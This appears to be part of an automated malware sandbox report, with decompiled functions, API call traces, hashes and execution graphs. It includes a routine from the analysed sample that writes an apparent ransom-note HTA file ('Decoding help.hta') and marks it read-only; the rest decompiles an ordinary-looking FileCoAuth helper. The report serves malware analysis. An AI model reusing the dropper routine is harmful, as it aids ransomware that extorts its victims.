    • CloseHandle.KERNEL32(004017A2,004017A2,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?), ref: 00401116
    • SetFileAttributesW.KERNEL32(?,00000001,004017A2,004017A2,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?), ref: 00401120
    • GlobalFree.KERNEL32 ref: 00401128
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: File$AttributesGlobal$AllocCloseCreateFreeHandleSleepWritelstrcatlstrcpylstrlen
    • String ID: Decoding help.hta
    • API String ID: 1426208985-3468781980
    • Opcode ID: 9761cd351f3edd8d3100a3e78f095c631499d3c334115afeaf584d012286736b
    • Instruction ID: a07d22388665de9fc9c644ac664cd7531801e3a95f641c2fda75b2bfcd3adf1b
    • Opcode Fuzzy Hash: 9761cd351f3edd8d3100a3e78f095c631499d3c334115afeaf584d012286736b
    • Instruction Fuzzy Hash: 09F06530804109BACF017BA6CC82A8D7E72AF0431CF1042B7F914351F2DB7906A2975D
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401096, Relevance: 7.5, APIs: 5, Instructions: 25stringfileCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 100%
    			E00401096(WCHAR* _a4) {
				void* _v8;
				WCHAR* _v12;
				long _v16;
				WCHAR* _t18;

				_t18 = E00401781(0x8000);
				_v12 = _t18;
				lstrcpyW(_v12, _a4);
				 *((char*)(_v12 + lstrlenW(_v12) * 2 - 6)) = 0;
				lstrcatW(_v12, 0x40379e);
				if(GetFileAttributesW(_v12) == 0xffffffff) {
					_v8 = CreateFileW(_v12, 0x40000000, 2, 0, 2, 0, 0);
					WriteFile(_v8, 0x403006,  *0x403ab3,  &_v16, 0);
					CloseHandle(_v8);
					SetFileAttributesW(_v12, 1);
				}
				return GlobalFree(_v12);
			}







    0x004010a1
    0x004010a6
    0x004010af
    0x004010bf
    0x004010cc
    0x004010dc
    0x004010f7
    0x0040110e
    0x00401116
    0x00401120
    0x00401120
    0x0040112e

    APIs
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,00401160,?,00401160,00004000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,00401160,?,00401160,00004000), ref: 00401797
    • lstrcpyW.KERNEL32 ref: 004010AF
    • lstrlenW.KERNEL32(?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010B7
    • lstrcatW.KERNEL32(?,0040379E), ref: 004010CC
    • GetFileAttributesW.KERNEL32(?,?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010D4
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?,0000002C,00000000,00000000,?,?), ref: 004010F2
    • WriteFile.KERNEL32(004017A2,00403006,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?,0000002C), ref: 0040110E
    • CloseHandle.KERNEL32(004017A2,004017A2,00403006,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?), ref: 00401116
    • SetFileAttributesW.KERNEL32(?,00000001,004017A2,004017A2,00403006,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?), ref: 00401120
    • GlobalFree.KERNEL32 ref: 00401128
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: File$AttributesGlobal$AllocCloseCreateFreeHandleSleepWritelstrcatlstrcpylstrlen
    • String ID:
    • API String ID: 1426208985-0
    • Opcode ID: 9761cd351f3edd8d3100a3e78f095c631499d3c334115afeaf584d012286736b
    • Instruction ID: a07d22388665de9fc9c644ac664cd7531801e3a95f641c2fda75b2bfcd3adf1b
    • Opcode Fuzzy Hash: 9761cd351f3edd8d3100a3e78f095c631499d3c334115afeaf584d012286736b
    • Instruction Fuzzy Hash: 09F06530804109BACF017BA6CC82A8D7E72AF0431CF1042B7F914351F2DB7906A2975D
    Uniqueness

    Uniqueness Score: -1,00%

    Analysis Process: FileCoAuth.exe PID: 2916 Parent PID: 692 FileCoAuth.exeCOMMON

    Execution Graph

    Execution Coverage:4.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:3.2%
    Total number of Nodes:378
    Total number of Limit Nodes:16

    Graph

    execution_graph 9979 e91be9 9984 e94e9d 9979->9984 9985 e94ebd 9984->9985 9991 e94df9 9985->9991 9988 ea2bba 10053 ea2b11 9988->10053 9990 e91bf8 9992 e94e0b 9991->9992 9993 e94e2d 9992->9993 9994 e94e0f 9992->9994 10012 e94d8f 9993->10012 10000 e94bdd 9994->10000 9999 e91bee 9999->9988 10001 e94bff 10000->10001 10002 e94bf4 ?_Xout_of_range@std@@YAXPBD 10000->10002 10003 e94c0c 10001->10003 10004 e94c23 10001->10004 10002->10001 10023 e94afd 10003->10023 10005 e94d8f 5 API calls 10004->10005 10009 e94c2b 10005->10009 10010 e942e3 ctype memcpy 10009->10010 10011 e94c21 10009->10011 10010->10011 10011->9999 10013 e94dab 10012->10013 10014 e94da0 ?_Xlength_error@std@@YAXPBD 10012->10014 10015 e94dbb 10013->10015 10016 e94db0 10013->10016 10014->10013 10017 e94db9 10015->10017 10042 e94307 10015->10042 10034 e94ca3 10016->10034 10017->9999 10020 e942e3 10017->10020 10021 e942ef 10020->10021 10022 e942f4 memcpy 10020->10022 10021->9999 10022->9999 10024 e94b0a ?_Xout_of_range@std@@YAXPBD 10023->10024 10025 e94b15 10023->10025 10024->10025 10026 e94b57 10025->10026 10027 e94b6b ?_Xout_of_range@std@@YAXPBD 10026->10027 10028 e94b76 10026->10028 10027->10028 10030 e94b81 10028->10030 10031 e94b32 10028->10031 10030->10011 10032 e94b3e 10031->10032 10033 e94b43 memmove 10031->10033 10032->10030 10033->10030 10035 e94caf __EH_prolog3_catch 10034->10035 10048 e94c72 10035->10048 10038 e94307 ctype 2 API calls 10041 e94d55 ctype 10038->10041 10039 e942e3 ctype memcpy 10040 e94d47 10039->10040 10040->10038 10041->10017 10043 e94319 10042->10043 10044 e9433a 10042->10044 10043->10044 10045 e94331 ??3@YAXPAX 10043->10045 10046 e942e3 ctype memcpy 10043->10046 10044->10017 10045->10044 10047 e9432e 10046->10047 10047->10045 10049 e94c9d 10048->10049 10050 e94c80 10048->10050 10049->10039 10049->10040 10051 e94c97 ?_Xbad_alloc@std@ 10050->10051 10052 e94c87 ??2@YAPAXI 10050->10052 10051->10049 10052->10049 10052->10051 10060 ea3220 10053->10060 10055 ea2b1d RtlDecodePointer 10056 ea2b43 7 API calls 10055->10056 10057 ea2b37 _onexit 10055->10057 10061 ea2bb1 _unlock 10056->10061 10059 ea2ba6 __onexit 10057->10059 10059->9990 10060->10055 10061->10059 10087 e91de6 10090 ea0bae RegGetValueW 10087->10090 10091 e91deb 10090->10091 10175 ea32c6 10176 ea32fb 10175->10176 10178 ea32d6 10175->10178 10177 ea3301 ?terminate@ __crtSetUnhandledExceptionFilter 10178->10176 10178->10177 10314 e91081 10315 e94e9d 9 API calls 10314->10315 10316 e91086 10315->10316 10317 ea2bba _pre_cpp_init 10 API calls 10316->10317 10318 e91090 10317->10318 10407 ea2f7a 10422 ea3220 10407->10422 10409 ea2f86 __crtGetShowWindowMode 10410 ea2faa 10409->10410 10411 ea2fcc _amsg_exit 10410->10411 10412 ea2fd6 10410->10412 10413 ea300b 10411->10413 10412->10413 10414 ea2fdf _initterm_e 10412->10414 10415 ea3019 _initterm 10413->10415 10417 ea3034 __IsNonwritableInCurrentImage 10413->10417 10414->10413 10416 ea2ffa __onexit 10414->10416 10415->10417 10418 ea3106 10417->10418 10421 ea30b7 exit 10417->10421 10423 e92e4b ?LoggingInitializeForExternalComponent@@YGJPB_W0_NG110 10417->10423 10418->10416 10419 ea310f _cexit 10418->10419 10419->10416 10421->10417 10422->10409 10426 e930ba 10423->10426 10427 e930ce CoInitializeEx 10426->10427 10431 e92e65 10426->10431 10428 e930fb 10427->10428 10429 e930e2 10427->10429 10432 e93102 GetCommandLineW 10428->10432 10430 e930ea GetModuleHandleW 10429->10430 10429->10431 10430->10432 10433 e930f9 10430->10433 10431->10417 10439 e93234 10432->10439 10433->10431 10436 e9311c 10436->10431 10438 e9312c CoUninitialize 10436->10438 10438->10431 10442 e93267 10439->10442 10441 e92237 6 API calls 10441->10442 10442->10441 10446 e932cc 10442->10446 10447 e932b7 10442->10447 10449 e932de 10442->10449 10462 e921f0 10442->10462 10444 e93112 10444->10436 10450 e9330a 10444->10450 10475 e9373d 10446->10475 10468 ea29f2 10447->10468 10449->10447 10481 e920c9 10449->10481 10606 e93696 10450->10606 10453 e9332a GetMessageW 10455 e93362 10453->10455 10456 e9333d TranslateMessage DispatchMessageW GetMessageW 10453->10456 10454 e93382 10458 ea29f2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 6 API calls 10454->10458 10455->10454 10620 e93a97 10455->10620 10456->10455 10456->10456 10460 e93390 10458->10460 10460->10436 10461 e93376 Sleep 10461->10454 10463 e9222c 10462->10463 10464 e921fd 10462->10464 10463->10442 10464->10463 10465 e92223 CharNextW 10464->10465 10466 e9221c CharNextW 10464->10466 10467 e92232 CharNextW 10464->10467 10465->10463 10465->10464 10466->10464 10466->10465 10467->10463 10469 ea29fa 10468->10469 10470 ea29fc IsProcessorFeaturePresent 10468->10470 10469->10444 10472 ea2c35 10470->10472 10487 ea2be4 IsDebuggerPresent _crt_debugger_hook __crtUnhandledException 10472->10487 10474 ea2d18 10474->10444 10476 e93787 10475->10476 10479 e93759 10475->10479 10478 e93796 10476->10478 10524 e92965 10476->10524 10478->10447 10479->10476 10479->10478 10490 e92546 10479->10490 10482 e92113 10481->10482 10486 e920e5 10481->10486 10484 e92122 10482->10484 10597 e928a9 10482->10597 10484->10447 10485 e92546 31 API calls 10485->10486 10486->10482 10486->10484 10486->10485 10488 ea2c0c _crt_debugger_hook 10487->10488 10489 ea2c14 __crtTerminateProcess 10487->10489 10488->10489 10489->10474 10491 e9257e 10490->10491 10493 e92870 10490->10493 10492 e925ad CoCreateInstance 10491->10492 10491->10493 10492->10493 10498 e925cf 10492->10498 10494 ea29f2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 6 API calls 10493->10494 10495 e928a3 10494->10495 10495->10479 10496 e92659 StringFromGUID2 wcscpy_s 10497 e91e60 10496->10497 10499 e9268a wcscat_s 10497->10499 10498->10493 10498->10496 10500 e91e60 10499->10500 10501 e926af wcscat_s 10500->10501 10502 e926cc 10501->10502 10543 e9235a 10502->10543 10505 e9278e wcscpy_s 10509 e91e60 10505->10509 10506 e92733 RegQueryInfoKeyW 10507 e9275b RegCloseKey 10506->10507 10508 e9276a 10506->10508 10507->10508 10508->10505 10552 e922df 10508->10552 10510 e927af wcscat_s 10509->10510 10511 e91e60 10510->10511 10512 e927d4 wcscat_s 10511->10512 10514 e927f1 10512->10514 10515 e9235a 11 API calls 10514->10515 10516 e9280d 10515->10516 10517 e92862 10516->10517 10518 e92817 RegQueryInfoKeyW 10516->10518 10521 e92869 RegCloseKey 10517->10521 10522 e92866 RegCloseKey 10517->10522 10519 e92839 RegCloseKey 10518->10519 10520 e92844 10518->10520 10519->10520 10520->10517 10523 e922df 6 API calls 10520->10523 10521->10493 10522->10521 10523->10517 10573 e923dd 10524->10573 10526 e92ab5 SysFreeString 10528 ea29f2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 6 API calls 10526->10528 10529 e92adf 10528->10529 10529->10478 10530 e92a5b 10532 e92a93 SysFreeString 10530->10532 10533 e92a74 GetModuleHandleW 10530->10533 10532->10526 10533->10532 10535 e92a83 GetProcAddress 10533->10535 10534 e929d9 SysStringLen wcsncpy_s 10539 e92a09 10534->10539 10535->10532 10536 e92a20 CharNextW 10536->10539 10537 e92a42 10537->10530 10540 e92ae3 10537->10540 10539->10536 10539->10537 10589 ea2d1c 10540->10589 10544 e92380 10543->10544 10545 e92392 RegOpenKeyExW 10543->10545 10561 e91f10 10544->10561 10546 e92390 10545->10546 10548 e923bb 10546->10548 10549 e923ae RegCloseKey 10546->10549 10550 ea29f2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 6 API calls 10548->10550 10549->10548 10551 e923d7 10550->10551 10551->10505 10551->10506 10553 e922fa 10552->10553 10554 e922ee 10552->10554 10556 e92325 10553->10556 10557 e92303 GetModuleHandleW 10553->10557 10567 e91f75 10554->10567 10559 e922f8 10556->10559 10560 e9234a RegDeleteKeyW 10556->10560 10557->10556 10558 e92312 GetProcAddress 10557->10558 10558->10556 10559->10505 10560->10559 10562 e91f1f GetModuleHandleW 10561->10562 10563 e91f52 10561->10563 10564 e91f3e 10562->10564 10566 e91f2e GetProcAddress 10562->10566 10563->10564 10565 e91f57 RegOpenKeyExW 10563->10565 10564->10546 10565->10564 10566->10564 10568 e91fb2 10567->10568 10569 e91f84 GetModuleHandleW 10567->10569 10570 e91fa3 10568->10570 10571 e91fb7 RegDeleteKeyW 10568->10571 10569->10570 10572 e91f93 GetProcAddress 10569->10572 10570->10559 10571->10570 10572->10570 10574 e92407 10573->10574 10584 e92433 10573->10584 10575 e9240f GetModuleFileNameW 10574->10575 10574->10584 10577 e9242e 10575->10577 10585 e9243a 10575->10585 10576 ea29f2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 6 API calls 10578 e92540 10576->10578 10592 e91ef0 GetLastError 10577->10592 10578->10526 10578->10530 10578->10534 10580 e92481 LoadTypeLib 10581 e924a0 10580->10581 10582 e92502 SysAllocString 10580->10582 10583 e924d1 wcscpy_s 10581->10583 10581->10584 10582->10584 10587 e91e60 10583->10587 10584->10576 10585->10580 10585->10584 10586 e92472 CharNextW 10585->10586 10586->10580 10586->10585 10588 e924ee LoadTypeLib 10587->10588 10588->10582 10588->10584 10593 ea2d28 IsProcessorFeaturePresent 10589->10593 10592->10584 10594 ea2d3c 10593->10594 10595 ea2be4 ___raise_securityfailure 5 API calls 10594->10595 10596 e92ae8 10595->10596 10598 e923dd 13 API calls 10597->10598 10602 e928d1 10598->10602 10600 ea29f2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 6 API calls 10601 e92961 10600->10601 10601->10484 10603 e928f3 GetModuleHandleW 10602->10603 10604 e92914 SysFreeString 10602->10604 10603->10604 10605 e92902 GetProcAddress 10603->10605 10604->10600 10605->10604 10608 e936a8 10606->10608 10607 e936ca 10610 e936d9 10607->10610 10611 e9371c CoResumeClassObjects 10607->10611 10617 e93324 10607->10617 10608->10607 10608->10617 10624 e91fc9 10608->10624 10630 e93a2e CreateEventW 10610->10630 10613 e936e4 10611->10613 10615 e93a97 CoRevokeClassObject 10613->10615 10613->10617 10615->10617 10616 e936eb CoResumeClassObjects 10618 e93713 FindCloseChangeNotification 10616->10618 10619 e936f7 SetEvent WaitForSingleObject 10616->10619 10617->10453 10617->10455 10618->10613 10619->10618 10621 e93aa8 10620->10621 10622 e9336b 10621->10622 10623 e93abc CoRevokeClassObject 10621->10623 10622->10454 10622->10461 10623->10621 10625 e91fe8 10624->10625 10626 e92015 10624->10626 10625->10626 10629 e91ffd CoRegisterClassObject 10625->10629 10627 ea29f2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 6 API calls 10626->10627 10628 e92030 10627->10628 10628->10608 10629->10626 10631 e93a85 10630->10631 10632 e93a55 CreateThread 10630->10632 10634 ea29f2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 6 API calls 10631->10634 10632->10631 10633 e93a73 CloseHandle 10632->10633 10636 e93ad2 WaitForSingleObject CloseHandle PostThreadMessageW 10632->10636 10633->10631 10635 e936de 10634->10635 10635->10613 10635->10616 10642 e91d79 10647 e9a7cf 10642->10647 10645 ea2bba _pre_cpp_init 10 API calls 10646 e91d88 10645->10646 10655 e9a822 memset 10647->10655 10649 e9a7d7 10656 e91e96 InitializeCriticalSectionEx 10649->10656 10652 e91d7e 10652->10645 10653 e9a802 IsDebuggerPresent 10653->10652 10654 e9a80c OutputDebugStringW 10653->10654 10654->10652 10655->10649 10657 e91ea8 GetLastError 10656->10657 10658 e91ebc 10656->10658 10657->10658 10658->10652 10658->10653 10659 e91278 10660 e94e9d 9 API calls 10659->10660 10661 e912b3 10660->10661 10662 e94e9d 9 API calls 10661->10662 10663 e912c8 10662->10663 10664 e94e9d 9 API calls 10663->10664 10665 e912dd 10664->10665 10680 e998f5 10665->10680 10668 e998f5 10 API calls 10669 e91305 10668->10669 10670 e94307 ctype 2 API calls 10669->10670 10671 e91313 10670->10671 10672 e94307 ctype 2 API calls 10671->10672 10673 e9131f 10672->10673 10674 e94307 ctype 2 API calls 10673->10674 10675 e9132b 10674->10675 10676 e94307 ctype 2 API calls 10675->10676 10677 e91337 10676->10677 10678 ea2bba _pre_cpp_init 10 API calls 10677->10678 10679 e91341 10678->10679 10681 e99929 10680->10681 10682 e99912 10680->10682 10707 e95904 10681->10707 10682->10681 10683 e9991d 10682->10683 10692 e9999f 10683->10692 10687 e99927 10689 e9580e 10687->10689 10716 e957be 10689->10716 10693 e99acc ?_Xout_of_range@std@@YAXPBD 10692->10693 10694 e999b5 10692->10694 10694->10693 10695 e999c6 10694->10695 10696 e999d9 ?_Xlength_error@std@@YAXPBD 10695->10696 10697 e999e4 10695->10697 10696->10697 10698 e99a7e 10697->10698 10699 e94d8f 5 API calls 10697->10699 10698->10687 10700 e999fc 10699->10700 10700->10698 10701 e94b32 memmove 10700->10701 10702 e99a3c 10701->10702 10703 e99a80 10702->10703 10704 e99a43 10702->10704 10705 e942e3 ctype memcpy 10703->10705 10706 e94b32 memmove 10704->10706 10705->10698 10706->10698 10708 e9591b ?_Xout_of_range@std@@YAXPBD 10707->10708 10709 e95926 10707->10709 10708->10709 10710 e9594a 10709->10710 10711 e9593f ?_Xlength_error@std@@YAXPBD 10709->10711 10712 e94d8f 5 API calls 10710->10712 10715 e95987 10710->10715 10711->10710 10713 e9595b 10712->10713 10714 e942e3 ctype memcpy 10713->10714 10713->10715 10714->10715 10715->10687 10717 e957d0 10716->10717 10719 e912f1 10716->10719 10718 e94b32 memmove 10717->10718 10718->10719 10719->10668 10748 ea2e76 10749 ea2e84 __set_app_type RtlEncodePointer 10748->10749 10751 ea2efb _pre_c_init __RTC_Initialize 10749->10751 10752 ea2f09 __setusermatherr 10751->10752 10753 ea2f15 10751->10753 10752->10753 10758 ea354d _controlfp_s 10753->10758 10756 ea2f2c 10757 ea2f23 _configthreadlocale 10757->10756 10759 ea3569 _invoke_watson 10758->10759 10760 ea2f1a 10758->10760 10760->10756 10760->10757 10771 e9104c 10772 ea2bba _pre_cpp_init 10 API calls 10771->10772 10773 e91051 10772->10773 10862 e9102c 10867 e92f7a 10862->10867 10865 ea2bba _pre_cpp_init 10 API calls 10866 e91045 10865->10866 10868 e91e96 2 API calls 10867->10868 10869 e92fb1 GetCurrentThreadId 10868->10869 10871 e91031 10869->10871 10871->10865 10872 ea2f2f 10873 ea2bba _pre_cpp_init 10 API calls 10872->10873 10874 ea2f39 __wgetmainargs 10873->10874 10875 ea2f79 10874->10875 10876 ea2f71 _amsg_exit 10874->10876 10876->10875 10957 e91e02 10962 e91ec0 10957->10962 10959 e91e07 10960 ea2bba _pre_cpp_init 10 API calls 10959->10960 10961 e91e11 10960->10961 10963 e91e96 2 API calls 10962->10963 10964 e91ed6 10963->10964 10965 e91eda 10964->10965 10968 e91e46 _CxxThrowException 10964->10968 10965->10959 10967 e91ee5 DeleteCriticalSection 10967->10959 10969 e91e60 10968->10969 10969->10967 10970 e91005 10975 e92036 10970->10975 10973 ea2bba _pre_cpp_init 10 API calls 10974 e91014 10973->10974 10976 e91e96 2 API calls 10975->10976 10977 e9100a 10976->10977 10977->10973 10986 e9101b 10987 e91ec0 4 API calls 10986->10987 10988 e91020 10987->10988 10989 ea2bba _pre_cpp_init 10 API calls 10988->10989 10990 e9102a 10989->10990

    Executed Functions

    Function 00EA32C6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 53 ea32c6-ea32d4 54 ea32fb-ea32fe 53->54 55 ea32d6-ea32da 53->55 55->54 56 ea32dc-ea32e4 55->56 57 ea3301-ea3314 ?terminate@@YAXXZ __crtSetUnhandledExceptionFilter 56->57 58 ea32e6-ea32eb 56->58 58->57 59 ea32ed-ea32f2 58->59 59->57 60 ea32f4-ea32f9 59->60 60->54 60->57
    C-Code - Quality: 79%
    			E00EA32C6(intOrPtr* _a4) {
				intOrPtr* _t5;
				intOrPtr _t7;

				_t5 =  *_a4;
				if( *_t5 != 0xe06d7363 ||  *((intOrPtr*)(_t5 + 0x10)) != 3) {
					L6:
					return 0;
				} else {
					_t7 =  *((intOrPtr*)(_t5 + 0x14));
					if(_t7 == 0x19930520 || _t7 == 0x19930521 || _t7 == 0x19930522 || _t7 == 0x1994000) {
						L00EA3216();
						asm("int3");
						_push(E00EA32C6); // executed
						L00EA3586(); // executed
						return 0;
					} else {
						goto L6;
					}
				}
			}





    0x00ea32cc
    0x00ea32d4
    0x00ea32fb
    0x00ea32fe
    0x00ea32dc
    0x00ea32dc
    0x00ea32e4
    0x00ea3301
    0x00ea3306
    0x00ea3307
    0x00ea330c
    0x00ea3314
    0x00000000
    0x00000000
    0x00000000
    0x00ea32e4

    APIs
    • ?terminate@@YAXXZ.MSVCR120 ref: 00EA3301
    • __crtSetUnhandledExceptionFilter.MSVCR120(00EA32C6), ref: 00EA330C
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ?terminate@@ExceptionFilterUnhandled__crt
    • String ID: csm
    • API String ID: 327099231-945121583
    • Opcode ID: 19d27d24a354aee91fd6b04bf48b0ecc1ff464a07eaaa920ff20893a47ae9503
    • Instruction ID: c962a8837da7e8527aeb5bc85e7de9134e2a83cb455026d7641aaea887392166
    • Opcode Fuzzy Hash: 19d27d24a354aee91fd6b04bf48b0ecc1ff464a07eaaa920ff20893a47ae9503
    • Instruction Fuzzy Hash: 81E022395083008B4F28DD7D908591837C86B1B3057862405F645EF621CB20FF90C1A2
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E92E4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 37%
    			E00E92E4B(void* __ecx) {
				char* _t2;
				void* _t3;
				void* _t5;

				_t2 = L"FileCoAuth";
				__imp__?LoggingInitializeForExternalComponent@@YGJPB_W0_NG110@Z(_t2, _t2, 0, 0, 0, 0, 0); // executed
				_t3 = E00E930BA(_t2, __ecx, _t5, __ecx); // executed
				return _t3;
			}






    0x00e92e52
    0x00e92e59
    0x00e92e60
    0x00e92e65

    APIs
    • ?LoggingInitializeForExternalComponent@@YGJPB_W0_NG110@Z.LOGGINGPLATFORM(FileCoAuth,FileCoAuth,00000000,00000000,00000000,00000000,00000000), ref: 00E92E59
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Component@@ExternalG110@InitializeLogging
    • String ID: FileCoAuth
    • API String ID: 2036469951-891463421
    • Opcode ID: 5a9067c2c7daa64de9ce2818ba5c3687ab4e6e198c46dcd7d2439e7666340336
    • Instruction ID: a20504f3168b5c6aae509bebe845ec3f2767494020fe7df25ab64d5c29f67cde
    • Opcode Fuzzy Hash: 5a9067c2c7daa64de9ce2818ba5c3687ab4e6e198c46dcd7d2439e7666340336
    • Instruction Fuzzy Hash: 88B012F52201003EDE00A3740D0DE371D9CE75E3007005C103545F1053C924EC044231
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E930BA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
    Download Yara Rule
    C-Code - Quality: 53%
    			E00E930BA(signed int __eax, void* __ecx, void* __edi) {
				char _v8;
				WCHAR* _t5;
				signed int _t8;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;

				_t14 = __edi;
				_push(__ecx);
				if( *0xeb2314 == 0) {
					__imp__CoInitializeEx(0, 0, _t15); // executed
					_t16 = __eax;
					_v8 = __eax;
					if(__eax >= 0) {
						 *0xeb1826 = 1;
						L7:
						_t5 = GetCommandLineW();
						_t12 =  &_v8;
						if(E00E93234(_t5,  &_v8) != 1) {
							_t16 = _v8;
						} else {
							_t8 = E00E9330A(_t12, _t13, _t14, _t12); // executed
							_t16 = _t8;
						}
						if( *0xeb1826 != 0) {
							__imp__CoUninitialize();
						}
						L12:
						return _t16;
					}
					if(__eax != 0x80010106) {
						goto L12;
					}
					if(GetModuleHandleW(L"Mscoree.dll") != 0) {
						goto L7;
					}
					goto L12;
				}
				return __eax | 0xffffffff;
			}










    0x00e930ba
    0x00e930bf
    0x00e930c7
    0x00e930d3
    0x00e930d9
    0x00e930db
    0x00e930e0
    0x00e930fb
    0x00e93102
    0x00e93102
    0x00e93108
    0x00e93114
    0x00e93120
    0x00e93116
    0x00e93117
    0x00e9311c
    0x00e9311c
    0x00e9312a
    0x00e9312c
    0x00e9312c
    0x00e93132
    0x00000000
    0x00e93134
    0x00e930e8
    0x00000000
    0x00000000
    0x00e930f7
    0x00000000
    0x00000000
    0x00000000
    0x00e930f9
    0x00000000

    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 00E930D3
    • GetModuleHandleW.KERNEL32(Mscoree.dll), ref: 00E930EF
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: HandleInitializeModule
    • String ID: Mscoree.dll
    • API String ID: 2866158306-4150509846
    • Opcode ID: 152f93c3ad9e301dd0bb013e520a6e49a000ea8e6ee00f735c14c1318d080801
    • Instruction ID: 5668e5b6f4fa30090947d2fe09dc1c4cf6b5edf07623af9ca3c46a0f5f2b525a
    • Opcode Fuzzy Hash: 152f93c3ad9e301dd0bb013e520a6e49a000ea8e6ee00f735c14c1318d080801
    • Instruction Fuzzy Hash: 6B014930946251AFCF3497779C0979BBE949B1A764F141288FC90B31A0D6B05E4983E2
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93696, Relevance: 7.6, APIs: 5, Instructions: 55synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E00E93696(intOrPtr __ecx) {
				void* _t1;
				void* _t3;
				void* _t5;
				intOrPtr _t10;
				void* _t13;
				intOrPtr* _t14;
				void* _t15;
				void* _t17;

				_t9 = __ecx;
				_t1 =  *0xeb237c;
				_t14 =  *0xeb2378;
				_t13 = 1;
				while(_t14 < _t1) {
					if(_t13 >= 0) {
						_t9 =  *_t14;
						if( *_t14 != 0) {
							_t3 = E00E91FC9(_t9, _t9); // executed
							_t13 = _t3;
							_t1 =  *0xeb237c;
